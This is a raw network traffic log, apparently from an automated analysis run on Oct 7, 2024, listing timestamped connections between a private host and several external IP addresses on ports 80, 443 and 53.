                                                                                                                                      Oct 7, 2024 03:23:20.055699110 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.055718899 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.055741072 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.070596933 CEST44349893184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.070715904 CEST44349893184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.070774078 CEST49893443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:20.071038008 CEST49893443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:20.071059942 CEST44349893184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.071074963 CEST49893443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:20.071083069 CEST44349893184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094469070 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094486952 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094496965 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094506979 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094518900 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094531059 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094537020 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094542027 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094549894 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094552994 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094580889 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094592094 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094610929 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094621897 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094631910 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094643116 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094652891 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094655991 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094666004 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094677925 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094682932 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094690084 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094712973 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094717979 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094722986 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094732046 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094748974 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094752073 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094763041 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094774008 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094780922 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094784021 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.094809055 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.094818115 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101372004 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101402044 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101413012 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101427078 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101447105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101450920 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101461887 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101490021 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101496935 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101502895 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101512909 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101521969 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101532936 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101536036 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101567984 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101592064 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101593971 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101604939 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101618052 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101641893 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101658106 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101667881 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101669073 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101680040 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101696014 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101701021 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101715088 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101728916 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101739883 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101751089 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101756096 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101772070 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101779938 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101783037 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101794958 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.101803064 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101821899 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.101844072 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.115123034 CEST49900443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:20.115143061 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.115212917 CEST49900443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:20.115461111 CEST49900443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:20.115478039 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144375086 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144428968 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144457102 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144467115 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144483089 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144496918 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144504070 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144514084 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144522905 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144526958 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144537926 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144548893 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144553900 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144570112 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144586086 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144634008 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144644022 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144682884 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144692898 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144692898 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144709110 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144721031 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144722939 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144732952 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144752979 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144753933 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144771099 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144779921 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144784927 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144794941 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144800901 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144802094 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144828081 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144849062 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144859076 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144870043 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144879103 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144891024 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144905090 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144907951 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144915104 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144927979 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144944906 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144947052 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144954920 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.144959927 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144982100 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.144992113 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.145004988 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145015001 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145025969 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145036936 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145041943 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.145049095 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145060062 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.145060062 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.145081043 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.145139933 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145149946 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145159960 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145170927 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145178080 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.145180941 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.145190954 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.145215988 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:20.348633051 CEST4434989613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.351524115 CEST49896443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.351602077 CEST4434989613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.352123022 CEST49896443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.352139950 CEST4434989613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.358647108 CEST4434989413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.361479044 CEST49894443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.361500978 CEST4434989413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.362020969 CEST49894443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.362027884 CEST4434989413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.402452946 CEST6101053192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:20.407207966 CEST53610101.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.407275915 CEST6101053192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:20.409102917 CEST6101053192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:20.413855076 CEST53610101.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.418240070 CEST4434989713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.418760061 CEST49897443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.418778896 CEST4434989713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.419353008 CEST49897443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.419358969 CEST4434989713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.421521902 CEST4434989813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.421636105 CEST4434989913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.422127962 CEST49898443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.422143936 CEST4434989813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.423242092 CEST49899443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.423264980 CEST4434989913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.423351049 CEST49898443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.423356056 CEST4434989813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.423823118 CEST49899443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.423835993 CEST4434989913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.450871944 CEST4434989613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.451209068 CEST4434989613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.451281071 CEST49896443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.451426029 CEST49896443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.451426029 CEST49896443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.451461077 CEST4434989613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.451484919 CEST4434989613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.456485033 CEST61011443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.456522942 CEST4436101113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.456600904 CEST61011443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.456763029 CEST61011443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.456790924 CEST4436101113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.460648060 CEST4434989413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.460890055 CEST4434989413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.461004019 CEST49894443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.461333036 CEST49894443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.461347103 CEST4434989413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.461359978 CEST49894443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.461366892 CEST4434989413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.465878963 CEST61012443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.465899944 CEST4436101213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.465965986 CEST61012443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.466095924 CEST61012443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.466114998 CEST4436101213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.516357899 CEST4434989713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.516676903 CEST4434989713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.517070055 CEST49897443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.517226934 CEST49897443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.517226934 CEST49897443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.517256975 CEST4434989713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.517268896 CEST4434989713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.519787073 CEST61013443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.519884109 CEST4436101313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.520123005 CEST61013443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.520281076 CEST61013443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.520315886 CEST4436101313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.520380020 CEST4434989813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.520467043 CEST4434989813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.520520926 CEST49898443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.520837069 CEST49898443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.520837069 CEST49898443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.520844936 CEST4434989813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.520853996 CEST4434989813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.521111965 CEST4434989913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.521202087 CEST4434989913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.521245956 CEST4434989913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.521248102 CEST49899443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.521351099 CEST49899443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.521392107 CEST49899443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.521392107 CEST49899443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.521409988 CEST4434989913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.521430969 CEST4434989913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.523897886 CEST61014443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.523929119 CEST4436101413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.524132967 CEST61014443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.524765015 CEST61014443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.524805069 CEST4436101413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.525859118 CEST61015443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.525878906 CEST4436101513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.526221991 CEST61015443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.526424885 CEST61015443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:20.526437998 CEST4436101513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.755778074 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.755856037 CEST49900443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:20.757330894 CEST49900443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:20.757348061 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.757658958 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.759129047 CEST49900443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:20.799446106 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.855556965 CEST53610101.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.863199949 CEST6101053192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:20.868400097 CEST53610101.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.868463039 CEST6101053192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.033684015 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.033839941 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.033895016 CEST49900443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:21.062294960 CEST49900443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:21.062313080 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.062334061 CEST49900443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:21.062341928 CEST44349900184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.111567020 CEST4436101213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.111916065 CEST61012443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.111938000 CEST4436101213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.112318993 CEST61012443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.112332106 CEST4436101213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.125560045 CEST4436101113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.126418114 CEST61011443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.126463890 CEST4436101113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.126770973 CEST61011443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.126785040 CEST4436101113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.161432028 CEST4436101513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.161828041 CEST4436101313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.162149906 CEST4436101413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.162374973 CEST61015443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.162408113 CEST4436101513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.162808895 CEST61015443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.162823915 CEST4436101513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.162955999 CEST61013443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.162974119 CEST4436101313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.163343906 CEST61013443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.163352013 CEST4436101313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.163606882 CEST61014443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.163614988 CEST4436101413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.163908958 CEST61014443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.163913012 CEST4436101413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.209728003 CEST4436101213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.209908962 CEST4436101213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.209980965 CEST61012443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.210139990 CEST61012443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.210139990 CEST61012443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.210165977 CEST4436101213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.210175037 CEST4436101213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.212219954 CEST61021443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.212251902 CEST4436102113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.212308884 CEST61021443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.212405920 CEST61021443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:21.212412119 CEST4436102113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.228554964 CEST4436101113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.228712082 CEST4436101113.107.246.45192.168.2.4
